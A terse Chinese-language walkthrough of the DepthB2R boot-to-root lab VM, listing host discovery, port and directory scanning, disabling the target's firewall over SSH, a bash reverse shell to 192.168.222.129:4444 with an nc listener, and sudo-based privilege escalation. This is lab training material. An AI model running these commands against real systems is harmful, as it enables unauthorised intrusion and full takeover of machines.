DepthB2R.ova
先看一下自己的ip
ip a
主机发现
netdiscover -i eth0 -r 192.168.222.0/24
主机信息探测
nmap -p- 192.168.222.130
dirsearch -u"192.168.222.130:8080"
然后在本机网址拼接
然后输入ls -l/tmp
ps aux发现ssh猜测有防火墙
查看/etc果然有防火墙
尝试关闭
ssh bill@localhost sudo ufw disable
反弹shell同时开启监听
ssh bill@localhost bash -i >& /dev/tcp/192.168.222.129/4444 0>&1
nc -nvlp 4444~
提权
sudo -l
sudo su
whoami
至此,提权成功